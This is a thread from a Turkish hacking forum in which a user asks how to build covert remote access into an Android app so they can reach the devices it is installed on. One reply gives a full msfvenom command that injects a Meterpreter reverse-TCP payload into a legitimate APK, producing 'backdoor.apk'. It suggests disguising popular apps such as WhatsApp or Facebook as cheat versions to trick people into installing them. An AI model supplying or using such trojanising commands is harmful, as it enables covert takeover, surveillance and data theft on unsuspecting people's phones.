android uygulamaya gömme işlemi nasıl yaparım ?

kreatif7

Yeni üye
17 Kas 2021
3
0
Turkey
merhaba, foruma yeni katıldım hepinize merhabalar, yıllardan beri gördüğüm bu kaliteli ve ilginç toplulukta bulunmak ve burayı yeni XenForo tarafından desteklenen haliyle görmek mutluluk verici.

Ben bir uygulamaya (uygulama bana ait, kaynak kodu bende) o uygulamanın kurulduğu cihazlara erişim sağlamama izin verecek şekilde bir sistem kurmak istiyorum, illa ki uzaktan tam zamanlı kontrol olmasına gerek yok, arka planda bir ftp sunucusu çalıştırsa da olur ama böyle bir sistem gömmek istiyorum. Bu konuda bana bilgi verebilecek kişilere şimdiden teşekkür ediyorum.

16 Kas 2021
106
47
root@kali:~#
bunu yapmanın en kolay yolu MET@SPLOİT kullanmaktır kendisinde varsayılan olarak bir apk' nin içine virus enjekte edebilir bunu şu şekilde yapabilirsin

msfvenom -x orjinal.apk -p android/meterpreter/reverse_tcp LHOST=192.168.0.104 LPORT=4895 -o backdoor.apk

orjinal apk istediğin bir uygulama olabilir örneğin watsap,facebook bunları hileli diye kişilere yedirebilirsiniz
dackdoor apk virüsü enjekte ettiğimiz apk dir

şimdiden kolay gelsin bir sıkıntı çıkarsa yazabilirsin...

mehmetresat

Yeni üye
6 Nis 2020
4
1
hocam merhaba

konu biraz eski ama :) benimde bu şekilde bir projem var işim gereği projeyi tamamladıysanız hangi mantıkta ilerlediniz ? ayrıca projeyi tamamladıysanız androide root atma gereği duyuyormusunuz ?

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.